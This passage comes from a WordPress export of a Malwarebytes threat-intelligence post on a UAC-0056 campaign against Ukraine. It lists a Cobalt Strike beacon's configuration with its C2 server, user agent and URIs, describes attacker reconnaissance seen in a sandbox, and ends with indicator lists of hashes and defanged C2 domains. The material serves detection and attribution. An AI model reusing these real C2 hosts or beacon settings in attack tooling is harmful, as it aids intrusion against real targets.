data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-600x176.png\" loading=\"lazy\" width=\"2098\" height=\"616\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11.png\" alt=\"\" class=\"wp-image-58362\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11.png 2098w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-300x88.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-600x176.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-1536x451.png 1536w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/Figure11-2048x601.png 2048w\" sizes=\"auto, (max-width: 2098px) 100vw, 2098px\" \/><\/a><figcaption>Figure 11: Final PowerShell script<\/figcaption><\/figure>\n<h2>Cobalt Strike payload deployed<\/h2>\n<p>As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:<\/p>\n<p><strong>BeaconType<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8211; HTTPS<\/p>\n<p><strong>Port<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;     &#8211; 443<\/p>\n<p><strong>SleepTime<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&#8211; 30000<\/p>\n<p><strong>PublicKey_MD5<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8211; defb5d95ce99e1ebbf421a1a38d9cb64<\/p>\n<p><strong>C2Server<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&#8211; skreatortemp.site,\/s\/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o\/field-keywords\/<\/p>\n<p><strong>UserAgent<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&#8211; Mozilla\/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident\/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap<\/p>\n<p><strong>HttpPostUri<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &#8211; \/nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i\/avp\/amznussraps\/<\/p>\n<p><strong>Watermark<\/strong>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8211; 1580103824<\/p>\n<p>By having a Cobalt Strike instance running on the victim&#8217;s machine, it is now fully compromised.<\/p>\n<h2>Attacker probes the sandbox<\/h2>\n<p>At the time of writing, malicious C&amp;C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.<\/p>\n<p>We were able to decode the network communications using Didier Steven&#8217;s excellent collection of <a href=\"https:\/\/blog.didierstevens.com\/programs\/cobalt-strike-tools\/\" target=\"_blank\" rel=\"noreferrer noopener\">Cobalt Strike tools<\/a>.<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs.png\" data-rel=\"lightbox-image-11\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58353\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/cs\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs.png\" data-orig-size=\"677,353\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"cs\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs-300x156.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs-600x313.png\" loading=\"lazy\" width=\"677\" height=\"353\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs.png\" alt=\"\" class=\"wp-image-58353\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs.png 677w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs-300x156.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/cs-600x313.png 600w\" sizes=\"auto, (max-width: 677px) 100vw, 677px\" \/><\/a><figcaption>Figure 12: Cobalt Strike communication decoded<\/figcaption><\/figure>\n<p>We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.<\/p>\n<h2>Attribution to UAC-0056<\/h2>\n<p>Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056. <\/p>\n<p>Signatures contained in the Cobalt Strike beacons (watermark <code>1580103824<\/code> and public key <code>defb5d95ce99e1ebbf421a1a38d9cb64<\/code>), may be used to connect the attack to other groups. For instance, the public key&nbsp;<a href=\"https:\/\/hstechdocs.helpsystems.com\/manuals\/cobaltstrike\/current\/userguide\/content\/cobalt-4-5-user-guide.pdf\">should be unique among deployments<\/a>, according to the CobaltStrike documentation.<\/p>\n<p>However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.<\/p>\n<p>Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.<\/p>\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE.png\" data-rel=\"lightbox-image-12\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"58359\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/attachment\/mbae-48\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE.png\" data-orig-size=\"1094,844\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"MBAE\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE-300x231.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE-600x463.png\" loading=\"lazy\" width=\"1094\" height=\"844\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE.png\" alt=\"\" class=\"wp-image-58359\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE.png 1094w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE-300x231.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/07\/MBAE-600x463.png 600w\" sizes=\"auto, (max-width: 1094px) 100vw, 1094px\" \/><\/a><\/figure>\n<h1>IOCs<\/h1>\n<p><strong>Malicious Excel documents (Help Ukraine template)<\/strong><\/p>\n<p>fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3<br \/>c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a<br \/>1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532<code><br \/><\/code>258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0<br \/>e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386<br \/>ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff<br \/>eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df<\/p>\n<p><strong>Malicious Excel documents (Humanitarian template)<\/strong><\/p>\n<p>024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1<br \/>14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea<br \/>474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d<\/p>\n<p><strong>Payloads<\/strong><\/p>\n<p>0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470<br \/>aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a<br \/>fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346<br \/>501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff<\/p>\n<p><strong>Cobalt Strike beacon and payloads<\/strong><\/p>\n<p>136.144.41[.]177<br \/>syriahr[.]eu\/s\/Xnk75JwUcIebkrmENtufIiiKEmoqBN\/field-keywords\/<br \/>syriahr[.]eu\/nzXlLVas-VALvDh9lopkC\/avp\/amznussraps\/<br \/>skreatortemp[.]site<br \/>imolaoggi[.]eu<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/\">Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Wed, 13 Jul 2022 16:17:09 +0000<\/strong><\/p>\n<p>While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/07\/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign\/\">Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[24291,25537,12040,25587,25588],"class_list":["post-19587","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-cobalt-strike","tag-cobaltstrike","tag-threat-intelligence","tag-uac-0056","tag-unc2589"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19587","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19587"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19587\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19587"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}